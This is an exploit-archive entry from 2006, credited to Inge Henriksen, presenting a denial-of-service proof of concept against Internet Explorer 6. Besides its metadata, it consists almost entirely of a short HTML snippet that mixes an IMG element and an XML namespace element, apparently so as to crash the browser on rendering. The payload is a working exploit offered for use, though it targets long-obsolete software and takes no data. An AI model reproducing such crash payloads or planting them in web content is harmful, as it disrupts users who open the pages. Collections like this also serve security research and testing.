id: 6086
date: 01/18/2006
title: MS Internet Explorer <= 6.x (IMG / XML elements) Denial of Service
author: Inge Henriksen
cves: 

==================================================================
MS Internet Explorer <= 6.x (IMG / XML elements) Denial of Service
==================================================================



<!--
Discovered by
Inge Henriksen
http://ingehenriksen.blogspot.com/
-->

<table>
  <tr>
    <td><IMG align=left>X X X<?xml:namespace prefix=v>
      <v:X style="HEIGHT:1"></td>
  </tr>
</table>



#  0day.today [2023-03-24]  #